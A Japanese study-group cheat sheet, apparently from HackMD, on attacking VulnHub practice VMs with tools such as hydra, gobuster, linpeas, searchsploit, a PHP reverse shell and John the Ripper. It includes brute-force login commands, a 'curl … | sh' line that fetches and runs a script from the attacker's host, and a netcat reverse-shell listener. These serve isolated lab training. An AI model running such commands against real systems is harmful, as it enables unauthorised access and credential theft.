# vulnhub で遊ぼう vulnhu部 ## tools ### AutoRecon https://github.com/Tib3rius/AutoRecon ゲームが始まって一番最初にやり得なやつ 開始地点を教えてくれる ``` autorecon <target> ``` を行なって2,3分待つとカレントディレクトリに./result/が生えてくるのでよく見る。 特に`./result/scans/_manual_commands.txt`には次にやるべきことが書いてあるのでよく読む。 ### hydra https://www.kali.org/tools/hydra/ ログインとかブルートフォースするやつ POSTの例 ``` hydra -L rockyou.txt -P rockyou.txt 192.168.56.101 http-post-form '/kzMb5nVYJw/index.php:key=^USER^:invalid' ``` ターゲットを`ftp://192~`みたいにするとftpログインもブルートフォースできる #### 辞書について Kaliなら `/usr/share/wordlists/` にある 中でもrockyouはたくさん入ってて強い ### gobuster https://github.com/OJ/gobuster ブルートフォースするやつ2 ``` gobuster dir \ --url http://192.168.1.1/ \ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \ -x txt,php,html ``` - `-x`を付けないとディレクトリしか見てくれない - たとえば辞書に `abc` があるとき - `-x`なし: `/abc` があるか見てくれる - `-x txt,php,html`だと: `/abc` に加えて `/abc.txt`, `/abc.php`, `/abc.html` も見てくれる - もちろん時間は伸びる ### linpeas<span></span>.sh https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - VMのユーザーとしてリバースシェル等で接続した後、コンピュータ内の情報を得るのに使用する - VM内はインターネットに接続されていないため、インターネットに接続されているコンピュータを経由してファイルを得る必要がある。 ``` cd /tmp curl https://github.com/Cerbersec/scripts/raw/master/linux/linpeas.sh -LO sudo python -m http.server 80 ``` - その後、VM内部から ``` curl http://(ホストのIP addr)/linpeas.sh | sh ``` - SUID等の情報で更なる権限昇格が狙えるので見ておく - `linpeas.sh -a`で10分程時間はかかるがユーザーにありがちなパスワードtop2000を試してくれる ### seachsploit https://www.exploit-db.com/searchsploit https://www.exploit-db.com/ のデータをローカルに保存して検索できるやつ。 kaliならデフォルトで入っている >  > cms made simple 2.2.5で使える脆弱性がないか検索した例 場号を知ったあとは `seachsploit -m 46635` みたいにするとPoCのファイルを手元にコピーできるので、実行できる ### php-reverse-shell.php php製のリバースシェル。ip書き換えてアップして踏むだけでつながる kaliなら `/usr/share/webshells/php/php-reverse-shell.php` にある `nc -v -n -l -p 1234` みたいにしてウケる ### johntheripper ブルートフォースしてハッシュから元データを求めるやつ #### 公開鍵のパスフレーズを求める 1. `ssh2john ./id_rsa > hash.txt` 2. `john --wordlist=~/rockyou.txt hash.txt` ## 詰まったら - 既知のURLの`.bak`ファイルがないか確認してみる ## tips ### Reverse shell使用時の、表示やshellの使い勝手を通常時程度に改善する方法 - [Upgrading Simple Shells to Fully Interactive TTYs](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) - つまり?以下をやると楽になる -  - > SHELL=/bin/bash script -q /dev/null ### end Kernel panic - not syncing: で起動しない <details> - env - Windows 11, VirtualBox 7.0.6 r155176 - https://www.vulnhub.com/entry/nullbyte-1,126/ - Debian -  - [VirtualBox で end Kernel panic エラー](https://www.tohoho-web.com/tr/20221113_1.html) の通り。プロセッサを2にすると起動した -  </details> ### ネットワーク - [【VirtualBox】VirtualBoxの基本と仮想ネットワークを紹介 - えんでぃの技術ブログ](https://endy-tech.hatenablog.jp/entry/2018/10/27/134223) - 基本的にVMは信用できないのでインターネットに接続させたくない - ホストネットワークを使う - ファイル -> ツール -> Network Manager -  -  - VMがDHCPを使う設定になっているなら下限値から割り当てられるので192.168.56.101でVMのWebサーバーにつながった図 ## link 読んでおくとお役立ちそうなリンク - [Kali Linuxに(自分が)追加したいペネトレーションツール - 高林の雑記ブログ](https://kakyouim.hatenablog.com/entry/2020/04/17/182049)
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up